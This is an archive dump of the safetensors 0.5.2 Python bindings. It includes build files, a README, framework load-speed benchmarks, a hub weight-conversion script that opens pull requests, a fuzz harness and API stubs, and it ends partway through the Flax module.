memmap2 = "0.9" serde_json = "1.0" [dependencies.safetensors] path = "../../safetensors" safetensors-0.5.2/bindings/python/MANIFEST.in000066400000000000000000000002761473753372300207510ustar00rootroot00000000000000include Cargo.toml include pyproject.toml include rust-toolchain include ../../LICENSE recursive-include src * recursive-include safetensors-lib * recursive-exclude safetensors-lib/target * safetensors-0.5.2/bindings/python/Makefile000066400000000000000000000021171473753372300206470ustar00rootroot00000000000000.PHONY: deps_table_update modified_only_fixup extra_style_checks quality style fixup fix-copies test test-examples # make sure to test the local checkout in scripts and not the pre-installed one (don't use quotes!) export PYTHONPATH = src check_dirs := tests py_src modified_only_fixup: $(eval modified_py_files := $(shell python utils/get_modified_files.py $(check_dirs))) @if test -n "$(modified_py_files)"; then \ echo "Checking/fixing $(modified_py_files)"; \ black --preview $(modified_py_files); \ isort $(modified_py_files); \ flake8 $(modified_py_files); \ else \ echo "No library .py files were modified"; \ fi quality: black --check --preview $(check_dirs) isort --check-only $(check_dirs) flake8 $(check_dirs) # doc-builder style src/transformers docs/source --max_len 119 --check_only --path_to_docs docs/source style: black --preview $(check_dirs) isort $(check_dirs) # Super fast fix and check target that only works on relevant modified files since the branch was made fixup: modified_only_fixup test: python -m pytest -n auto --dist=loadfile -s -v ./tests/ safetensors-0.5.2/bindings/python/README.md000066400000000000000000000015241473753372300204670ustar00rootroot00000000000000## Installation ``` pip install safetensors ``` ## Usage ### Numpy ```python from safetensors.numpy import save_file, load_file import numpy as np tensors = { "a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8) } save_file(tensors, "./model.safetensors") # Now loading loaded = load_file("./model.safetensors") ``` ### Torch ```python from safetensors.torch import save_file, load_file import torch tensors = { "a": torch.zeros((2, 2)), "b": torch.zeros((2, 3), dtype=torch.uint8) } save_file(tensors, "./model.safetensors") # Now loading loaded = load_file("./model.safetensors") ``` ### Developing ``` # inside ./safetensors/bindings/python pip install .[dev] ``` Should be enough to install this library locally. ### Testing ``` # inside ./safetensors/bindings/python pip install .[dev] pytest -sv tests/ ``` safetensors-0.5.2/bindings/python/benches/000077500000000000000000000000001473753372300206155ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/benches/test_flax.py000066400000000000000000000041361473753372300231640ustar00rootroot00000000000000import os import tempfile import jax.numpy as jnp from flax.serialization import msgpack_restore, msgpack_serialize from safetensors.flax import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = jnp.zeros((50257, 768)) tensors["wpe"] = jnp.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = jnp.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = jnp.zeros((768,)) tensors[f"h.{i}.attn.bias"] = jnp.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = jnp.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = jnp.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = jnp.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = jnp.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = jnp.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = jnp.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = jnp.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = jnp.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = jnp.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = jnp.zeros((768)) tensors["ln_f.weight"] = jnp.zeros((768)) tensors["ln_f.bias"] = jnp.zeros((768)) return tensors def load(filename): with open(filename, "rb") as f: data = f.read() flax_weights = msgpack_restore(data) return flax_weights def test_flax_flax_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: serialized = msgpack_serialize(weights) f.write(serialized) result = benchmark(load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert jnp.allclose(v, tv) def test_flax_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert jnp.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_mlx.py000066400000000000000000000042011473753372300230230ustar00rootroot00000000000000import os import platform import tempfile if platform.system() == "Darwin": import mlx.core as mx from safetensors.mlx import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = mx.zeros((50257, 768)) tensors["wpe"] = mx.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = mx.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = mx.zeros((768,)) tensors[f"h.{i}.attn.bias"] = mx.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = mx.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = mx.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = mx.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = mx.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = mx.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = mx.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = mx.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = mx.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = mx.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = mx.zeros((768)) tensors["ln_f.weight"] = mx.zeros((768)) tensors["ln_f.bias"] = mx.zeros((768)) return tensors def load(filename): return mx.load(filename) def test_mlx_mlx_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: filename = f"{f.name}.npz" mx.savez(filename, **weights) result = benchmark(load, filename) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert mx.allclose(v, tv) def test_mlx_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert mx.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_paddle.py000066400000000000000000000036601473753372300234640ustar00rootroot00000000000000import os import tempfile import numpy as np import paddle from safetensors.paddle import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = paddle.zeros((50257, 768)) tensors["wpe"] = paddle.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = paddle.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = paddle.zeros((768,)) tensors[f"h.{i}.attn.bias"] = paddle.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = paddle.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = paddle.zeros((2304,)) tensors[f"h.{i}.attn.c_proj.weight"] = paddle.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = paddle.zeros((768,)) tensors[f"h.{i}.ln_2.weight"] = paddle.zeros((768,)) tensors[f"h.{i}.ln_2.bias"] = paddle.zeros((768,)) tensors[f"h.{i}.mlp.c_fc.weight"] = paddle.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = paddle.zeros((3072,)) tensors[f"h.{i}.mlp.c_proj.weight"] = paddle.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = paddle.zeros((768,)) tensors["ln_f.weight"] = paddle.zeros((768,)) tensors["ln_f.bias"] = paddle.zeros((768,)) return tensors def test_paddle_paddle_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: paddle.save(weights, f.name) result = benchmark(paddle.load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert paddle.allclose(v, tv) def test_paddle_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert np.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_pt.py000066400000000000000000000112341473753372300226520ustar00rootroot00000000000000import os import tempfile import pytest import torch from safetensors.torch import load_file, save_file def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = torch.zeros((50257, 768)) tensors["wpe"] = torch.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = torch.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = torch.zeros((768,)) tensors[f"h.{i}.attn.bias"] = torch.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = torch.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = torch.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = torch.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = torch.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = torch.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = torch.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = torch.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = torch.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = torch.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = torch.zeros((768)) tensors["ln_f.weight"] = torch.zeros((768)) tensors["ln_f.bias"] = torch.zeros((768)) return tensors def create_lora(n_layers: int): tensors = {} for i in range(n_layers): tensors[f"lora.{i}.up.weight"] = torch.zeros((32, 32)) tensors[f"lora.{i}.down.weight"] = torch.zeros((32, 32)) return tensors def test_pt_pt_load_cpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) def test_pt_sf_load_cpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) def test_pt_pt_load_cpu_small(benchmark): weights = create_lora(500) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) def test_pt_sf_load_cpu_small(benchmark): weights = create_lora(500) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert torch.allclose(v, tv) @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") def test_pt_pt_load_gpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name, map_location="cuda:0") os.unlink(f.name) for k, v in weights.items(): v = v.cuda() tv = result[k] assert torch.allclose(v, tv) @pytest.mark.skipif(not torch.cuda.is_available(), reason="requires cuda") def test_pt_sf_load_gpu(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name, device="cuda:0") os.unlink(f.name) for k, v in weights.items(): v = v.cuda() tv = result[k] assert torch.allclose(v, tv) @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") def test_pt_pt_load_mps(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: torch.save(weights, f) result = benchmark(torch.load, f.name, map_location="mps") os.unlink(f.name) for k, v in weights.items(): v = v.to(device="mps") tv = result[k] assert torch.allclose(v, tv) @pytest.mark.skipif(not hasattr(torch.backends, "mps") or not torch.backends.mps.is_available(), reason="requires mps") def test_pt_sf_load_mps(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name, device="mps") os.unlink(f.name) for k, v in weights.items(): v = v.to(device="mps") tv = result[k] assert torch.allclose(v, tv) safetensors-0.5.2/bindings/python/benches/test_tf.py000066400000000000000000000051071473753372300226420ustar00rootroot00000000000000import os import tempfile import h5py import numpy as np import tensorflow as tf from safetensors.tensorflow import load_file, save_file def _load(filename, tensors=None, prefix=""): with h5py.File(filename, "r") as f: if tensors is None: tensors = {} for k in f.keys(): if isinstance(f[k], h5py._hl.dataset.Dataset): key = k if not prefix else f"{prefix}_{k}" tensors[key] = tf.convert_to_tensor(np.array(f[k])) else: tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) return tensors def _save(filename, tensors, prefix=""): with h5py.File(filename, "w") as f: for name, tensor in tensors.items(): tensor = tensor.numpy() dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) dset[:] = tensor def create_gpt2(n_layers: int): tensors = {} tensors["wte"] = tf.zeros((50257, 768)) tensors["wpe"] = tf.zeros((1024, 768)) for i in range(n_layers): tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,)) tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,)) tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024)) tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304)) tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304)) tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768)) tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768)) tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768)) tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768)) tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072)) tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072)) tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768)) tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768)) tensors["ln_f.weight"] = tf.zeros((768)) tensors["ln_f.bias"] = tf.zeros((768)) return tensors def test_tf_tf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: _save(f.name, weights) result = benchmark(_load, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert np.allclose(v, tv) def test_tf_sf_load(benchmark): # benchmark something weights = create_gpt2(12) with tempfile.NamedTemporaryFile(delete=False) as f: save_file(weights, f.name) result = benchmark(load_file, f.name) os.unlink(f.name) for k, v in weights.items(): tv = result[k] assert np.allclose(v, tv) safetensors-0.5.2/bindings/python/convert.py000066400000000000000000000346611473753372300212520ustar00rootroot00000000000000import argparse import json import os import shutil from collections import defaultdict from tempfile import TemporaryDirectory from typing import Dict, List, Optional, Set, Tuple import torch from huggingface_hub import CommitInfo, CommitOperationAdd, Discussion, HfApi, hf_hub_download from huggingface_hub.file_download import repo_folder_name from safetensors.torch import _find_shared_tensors, _is_complete, load_file, save_file COMMIT_DESCRIPTION = """ This is an automated PR created with https://huggingface.co/spaces/safetensors/convert This new file is equivalent to `pytorch_model.bin` but safe in the sense that no arbitrary code can be put into it. These files also happen to load much faster than their pytorch counterpart: https://colab.research.google.com/github/huggingface/notebooks/blob/main/safetensors_doc/en/speed.ipynb The widgets on your model page will run using this model even if this is not merged making sure the file actually works. If you find any issues: please report here: https://huggingface.co/spaces/safetensors/convert/discussions Feel free to ignore this PR. """ ConversionResult = Tuple[List["CommitOperationAdd"], List[Tuple[str, "Exception"]]] def _remove_duplicate_names( state_dict: Dict[str, torch.Tensor], *, preferred_names: List[str] = None, discard_names: List[str] = None, ) -> Dict[str, List[str]]: if preferred_names is None: preferred_names = [] preferred_names = set(preferred_names) if discard_names is None: discard_names = [] discard_names = set(discard_names) shareds = _find_shared_tensors(state_dict) to_remove = defaultdict(list) for shared in shareds: complete_names = set([name for name in shared if _is_complete(state_dict[name])]) if not complete_names: if len(shared) == 1: # Force contiguous name = list(shared)[0] state_dict[name] = state_dict[name].clone() complete_names = {name} else: raise RuntimeError( f"Error while trying to find names to remove to save state dict, but found no suitable name to keep for saving amongst: {shared}. None is covering the entire storage.Refusing to save/load the model since you could be storing much more memory than needed. Please refer to https://huggingface.co/docs/safetensors/torch_shared_tensors for more information. Or open an issue." ) keep_name = sorted(list(complete_names))[0] # Mecanism to preferentially select keys to keep # coming from the on-disk file to allow # loading models saved with a different choice # of keep_name preferred = complete_names.difference(discard_names) if preferred: keep_name = sorted(list(preferred))[0] if preferred_names: preferred = preferred_names.intersection(complete_names) if preferred: keep_name = sorted(list(preferred))[0] for name in sorted(shared): if name != keep_name: to_remove[keep_name].append(name) return to_remove def get_discard_names(model_id: str, revision: Optional[str], folder: str, token: Optional[str]) -> List[str]: try: import json import transformers config_filename = hf_hub_download( model_id, revision=revision, filename="config.json", token=token, cache_dir=folder ) with open(config_filename, "r") as f: config = json.load(f) architecture = config["architectures"][0] class_ = getattr(transformers, architecture) # Name for this varible depends on transformers version. discard_names = getattr(class_, "_tied_weights_keys", []) except Exception: discard_names = [] return discard_names class AlreadyExists(Exception): pass def check_file_size(sf_filename: str, pt_filename: str): sf_size = os.stat(sf_filename).st_size pt_size = os.stat(pt_filename).st_size if (sf_size - pt_size) / pt_size > 0.01: raise RuntimeError( f"""The file size different is more than 1%: - {sf_filename}: {sf_size} - {pt_filename}: {pt_size} """ ) def rename(pt_filename: str) -> str: filename, ext = os.path.splitext(pt_filename) local = f"{filename}.safetensors" local = local.replace("pytorch_model", "model") return local def convert_multi( model_id: str, *, revision=Optional[str], folder: str, token: Optional[str], discard_names: List[str] ) -> ConversionResult: filename = hf_hub_download( repo_id=model_id, revision=revision, filename="pytorch_model.bin.index.json", token=token, cache_dir=folder ) with open(filename, "r") as f: data = json.load(f) filenames = set(data["weight_map"].values()) local_filenames = [] for filename in filenames: pt_filename = hf_hub_download(repo_id=model_id, filename=filename, token=token, cache_dir=folder) sf_filename = rename(pt_filename) sf_filename = os.path.join(folder, sf_filename) convert_file(pt_filename, sf_filename, discard_names=discard_names) local_filenames.append(sf_filename) index = os.path.join(folder, "model.safetensors.index.json") with open(index, "w") as f: newdata = {k: v for k, v in data.items()} newmap = {k: rename(v) for k, v in data["weight_map"].items()} newdata["weight_map"] = newmap json.dump(newdata, f, indent=4) local_filenames.append(index) operations = [ CommitOperationAdd(path_in_repo=os.path.basename(local), path_or_fileobj=local) for local in local_filenames ] errors: List[Tuple[str, "Exception"]] = [] return operations, errors def convert_single( model_id: str, *, revision: Optional[str], folder: str, token: Optional[str], discard_names: List[str] ) -> ConversionResult: pt_filename = hf_hub_download( repo_id=model_id, revision=revision, filename="pytorch_model.bin", token=token, cache_dir=folder ) sf_name = "model.safetensors" sf_filename = os.path.join(folder, sf_name) convert_file(pt_filename, sf_filename, discard_names) operations = [CommitOperationAdd(path_in_repo=sf_name, path_or_fileobj=sf_filename)] errors: List[Tuple[str, "Exception"]] = [] return operations, errors def convert_file( pt_filename: str, sf_filename: str, discard_names: List[str], ): loaded = torch.load(pt_filename, map_location="cpu") if "state_dict" in loaded: loaded = loaded["state_dict"] to_removes = _remove_duplicate_names(loaded, discard_names=discard_names) metadata = {"format": "pt"} for kept_name, to_remove_group in to_removes.items(): for to_remove in to_remove_group: if to_remove not in metadata: metadata[to_remove] = kept_name del loaded[to_remove] # Force tensors to be contiguous loaded = {k: v.contiguous() for k, v in loaded.items()} dirname = os.path.dirname(sf_filename) os.makedirs(dirname, exist_ok=True) save_file(loaded, sf_filename, metadata=metadata) check_file_size(sf_filename, pt_filename) reloaded = load_file(sf_filename) for k in loaded: pt_tensor = loaded[k] sf_tensor = reloaded[k] if not torch.equal(pt_tensor, sf_tensor): raise RuntimeError(f"The output tensors do not match for key {k}") def create_diff(pt_infos: Dict[str, List[str]], sf_infos: Dict[str, List[str]]) -> str: errors = [] for key in ["missing_keys", "mismatched_keys", "unexpected_keys"]: pt_set = set(pt_infos[key]) sf_set = set(sf_infos[key]) pt_only = pt_set - sf_set sf_only = sf_set - pt_set if pt_only: errors.append(f"{key} : PT warnings contain {pt_only} which are not present in SF warnings") if sf_only: errors.append(f"{key} : SF warnings contain {sf_only} which are not present in PT warnings") return "\n".join(errors) def previous_pr(api: "HfApi", model_id: str, pr_title: str, revision=Optional[str]) -> Optional["Discussion"]: try: revision_commit = api.model_info(model_id, revision=revision).sha discussions = api.get_repo_discussions(repo_id=model_id) except Exception: return None for discussion in discussions: if discussion.status in {"open", "closed"} and discussion.is_pull_request and discussion.title == pr_title: commits = api.list_repo_commits(model_id, revision=discussion.git_reference) if revision_commit == commits[1].commit_id: return discussion return None def convert_generic( model_id: str, *, revision=Optional[str], folder: str, filenames: Set[str], token: Optional[str] ) -> ConversionResult: operations = [] errors = [] extensions = set([".bin", ".ckpt"]) for filename in filenames: prefix, ext = os.path.splitext(filename) if ext in extensions: pt_filename = hf_hub_download( model_id, revision=revision, filename=filename, token=token, cache_dir=folder ) dirname, raw_filename = os.path.split(filename) if raw_filename == "pytorch_model.bin": # XXX: This is a special case to handle `transformers` and the # `transformers` part of the model which is actually loaded by `transformers`. sf_in_repo = os.path.join(dirname, "model.safetensors") else: sf_in_repo = f"{prefix}.safetensors" sf_filename = os.path.join(folder, sf_in_repo) try: convert_file(pt_filename, sf_filename, discard_names=[]) operations.append(CommitOperationAdd(path_in_repo=sf_in_repo, path_or_fileobj=sf_filename)) except Exception as e: errors.append((pt_filename, e)) return operations, errors def convert( api: "HfApi", model_id: str, revision: Optional[str] = None, force: bool = False ) -> Tuple["CommitInfo", List[Tuple[str, "Exception"]]]: pr_title = "Adding `safetensors` variant of this model" info = api.model_info(model_id, revision=revision) filenames = set(s.rfilename for s in info.siblings) with TemporaryDirectory() as d: folder = os.path.join(d, repo_folder_name(repo_id=model_id, repo_type="models")) os.makedirs(folder) new_pr = None try: operations = None pr = previous_pr(api, model_id, pr_title, revision=revision) library_name = getattr(info, "library_name", None) if any(filename.endswith(".safetensors") for filename in filenames) and not force: raise AlreadyExists(f"Model {model_id} is already converted, skipping..") elif pr is not None and not force: url = f"https://huggingface.co/{model_id}/discussions/{pr.num}" new_pr = pr raise AlreadyExists(f"Model {model_id} already has an open PR check out {url}") elif library_name == "transformers": discard_names = get_discard_names(model_id, revision=revision, folder=folder, token=api.token) if "pytorch_model.bin" in filenames: operations, errors = convert_single( model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names ) elif "pytorch_model.bin.index.json" in filenames: operations, errors = convert_multi( model_id, revision=revision, folder=folder, token=api.token, discard_names=discard_names ) else: raise RuntimeError(f"Model {model_id} doesn't seem to be a valid pytorch model. Cannot convert") else: operations, errors = convert_generic( model_id, revision=revision, folder=folder, filenames=filenames, token=api.token ) if operations: new_pr = api.create_commit( repo_id=model_id, revision=revision, operations=operations, commit_message=pr_title, commit_description=COMMIT_DESCRIPTION, create_pr=True, ) print(f"Pr created at {new_pr.pr_url}") else: print("No files to convert") finally: shutil.rmtree(folder) return new_pr, errors if __name__ == "__main__": DESCRIPTION = """ Simple utility tool to convert automatically some weights on the hub to `safetensors` format. It is PyTorch exclusive for now. It works by downloading the weights (PT), converting them locally, and uploading them back as a PR on the hub. """ parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument( "model_id", type=str, help="The name of the model on the hub to convert. E.g. `gpt2` or `facebook/wav2vec2-base-960h`", ) parser.add_argument( "--revision", type=str, help="The revision to convert", ) parser.add_argument( "--force", action="store_true", help="Create the PR even if it already exists of if the model was already converted.", ) parser.add_argument( "-y", action="store_true", help="Ignore safety prompt", ) args = parser.parse_args() model_id = args.model_id api = HfApi() if args.y: txt = "y" else: txt = input( "This conversion script will unpickle a pickled file, which is inherently unsafe. If you do not trust this file, we invite you to use" " https://huggingface.co/spaces/safetensors/convert or google colab or other hosted solution to avoid potential issues with this file." " Continue [Y/n] ?" ) if txt.lower() in {"", "y"}: commit_info, errors = convert(api, model_id, revision=args.revision, force=args.force) string = f""" ### Success 🔥 Yay! This model was successfully converted and a PR was open using your token, here: [{commit_info.pr_url}]({commit_info.pr_url}) """ if errors: string += "\nErrors during conversion:\n" string += "\n".join( f"Error while converting {filename}: {e}, skipped conversion" for filename, e in errors ) print(string) else: print(f"Answer was `{txt}` aborting.") safetensors-0.5.2/bindings/python/convert_all.py000066400000000000000000000026561473753372300221010ustar00rootroot00000000000000"""Simple utility tool to convert automatically most downloaded models""" from convert import AlreadyExists, convert from huggingface_hub import HfApi, ModelFilter, ModelSearchArguments from transformers import AutoConfig if __name__ == "__main__": api = HfApi() args = ModelSearchArguments() total = 50 models = list( api.list_models(filter=ModelFilter(library=args.library.Transformers), sort="downloads", direction=-1) )[:total] correct = 0 errors = set() for model in models: model = api.model_info(model.id, files_metadata=True) size = None for sibling in model.siblings: if sibling.rfilename == "pytorch_model.bin": size = sibling.size if size is None or size > 2_000_000_000: print(f"[{model.downloads}] Skipping {model.modelId} (too large {size})") continue model_id = model.modelId print(f"[{model.downloads}] {model.modelId}") try: convert(api, model_id) correct += 1 except AlreadyExists as e: correct += 1 print(e) except Exception as e: config = AutoConfig.from_pretrained(model_id) errors.add(config.__class__.__name__) print(e) print(f"Errors: {errors}") print(f"File size is difference {len(errors)}") print(f"Correct rate {correct}/{total} ({correct/total * 100:.2f}%)") safetensors-0.5.2/bindings/python/fuzz.py000066400000000000000000000013311473753372300205540ustar00rootroot00000000000000import datetime import sys import tempfile from collections import defaultdict import atheris with atheris.instrument_imports(): from safetensors.torch import load_file EXCEPTIONS = defaultdict(int) START = datetime.datetime.now() DT = datetime.timedelta(seconds=30) def TestOneInput(data): global START with tempfile.NamedTemporaryFile() as f: f.write(data) f.seek(0) try: load_file(f.name, device=0) except Exception as e: EXCEPTIONS[str(e)] += 1 if datetime.datetime.now() - START > DT: for e, n in EXCEPTIONS.items(): print(e, n) START = datetime.datetime.now() atheris.Setup(sys.argv, TestOneInput) atheris.Fuzz() safetensors-0.5.2/bindings/python/py_src/000077500000000000000000000000001473753372300205055ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/py_src/safetensors/000077500000000000000000000000001473753372300230415ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/py_src/safetensors/__init__.py000066400000000000000000000002531473753372300251520ustar00rootroot00000000000000# Re-export this from ._safetensors_rust import ( # noqa: F401 SafetensorError, __version__, deserialize, safe_open, serialize, serialize_file, ) safetensors-0.5.2/bindings/python/py_src/safetensors/__init__.pyi000066400000000000000000000072541473753372300253330ustar00rootroot00000000000000# Generated content DO NOT EDIT @staticmethod def deserialize(bytes): """ Opens a safetensors lazily and returns tensors as asked Args: data (`bytes`): The byte content of a file Returns: (`List[str, Dict[str, Dict[str, any]]]`): The deserialized content is like: [("tensor_name", {"shape": [2, 3], "dtype": "F32", "data": b"\0\0.." }), (...)] """ pass @staticmethod def serialize(tensor_dict, metadata=None): """ Serializes raw data. Args: tensor_dict (`Dict[str, Dict[Any]]`): The tensor dict is like: {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} metadata (`Dict[str, str]`, *optional*): The optional purely text annotations Returns: (`bytes`): The serialized content. """ pass @staticmethod def serialize_file(tensor_dict, filename, metadata=None): """ Serializes raw data. Args: tensor_dict (`Dict[str, Dict[Any]]`): The tensor dict is like: {"tensor_name": {"dtype": "F32", "shape": [2, 3], "data": b"\0\0"}} filename (`str`, or `os.PathLike`): The name of the file to write into. metadata (`Dict[str, str]`, *optional*): The optional purely text annotations Returns: (`bytes`): The serialized content. """ pass class safe_open: """ Opens a safetensors lazily and returns tensors as asked Args: filename (`str`, or `os.PathLike`): The filename to open framework (`str`): The framework you want you tensors in. Supported values: `pt`, `tf`, `flax`, `numpy`. device (`str`, defaults to `"cpu"`): The device on which you want the tensors. """ def __init__(self, filename, framework, device=...): pass def __enter__(self): """ Start the context manager """ pass def __exit__(self, _exc_type, _exc_value, _traceback): """ Exits the context manager """ pass def get_slice(self, name): """ Returns a full slice view object Args: name (`str`): The name of the tensor you want Returns: (`PySafeSlice`): A dummy object you can slice into to get a real tensor Example: ```python from safetensors import safe_open with safe_open("model.safetensors", framework="pt", device=0) as f: tensor_part = f.get_slice("embedding")[:, ::8] ``` """ pass def get_tensor(self, name): """ Returns a full tensor Args: name (`str`): The name of the tensor you want Returns: (`Tensor`): The tensor in the framework you opened the file for. Example: ```python from safetensors import safe_open with safe_open("model.safetensors", framework="pt", device=0) as f: tensor = f.get_tensor("embedding") ``` """ pass def keys(self): """ Returns the names of the tensors in the file. Returns: (`List[str]`): The name of the tensors contained in that file """ pass def metadata(self): """ Return the special non tensor information in the header Returns: (`Dict[str, str]`): The freeform metadata. """ pass class SafetensorError(Exception): """ Custom Python Exception for Safetensor errors. """ safetensors-0.5.2/bindings/python/py_src/safetensors/flax.py000066400000000000000000000074061473753372300243540ustar00rootroot00000000000000import os from typing import Dict, Optional, Union import numpy as np import jax.numpy as jnp from jax import Array from safetensors import numpy, safe_open def save(tensors: Dict[str, Array], metadata: Optional[Dict[str, str]] = None) -> bytes: """ Saves a dictionary of tensors into raw bytes in safetensors format. Args: tensors (`Dict[str, Array]`): The incoming tensors. Tensors need to be contiguous and dense. metadata (`Dict[str, str]`, *optional*, defaults to `None`): Optional text only metadata you might want to save in your header. For instance it can be useful to specify more about the underlying tensors. This is purely informative and does not affect tensor loading. Returns: `bytes`: The raw bytes representing the format Example: ```python from safetensors.flax import save from jax import numpy as jnp tensors = {"embedding": jnp.zeros((512, 1024)), "attention": jnp.zeros((256, 256))} byte_data = save(tensors) ``` """ np_tensors = _jnp2np(tensors) return numpy.save(np_tensors, metadata=metadata) def save_file( tensors: Dict[str, Array], 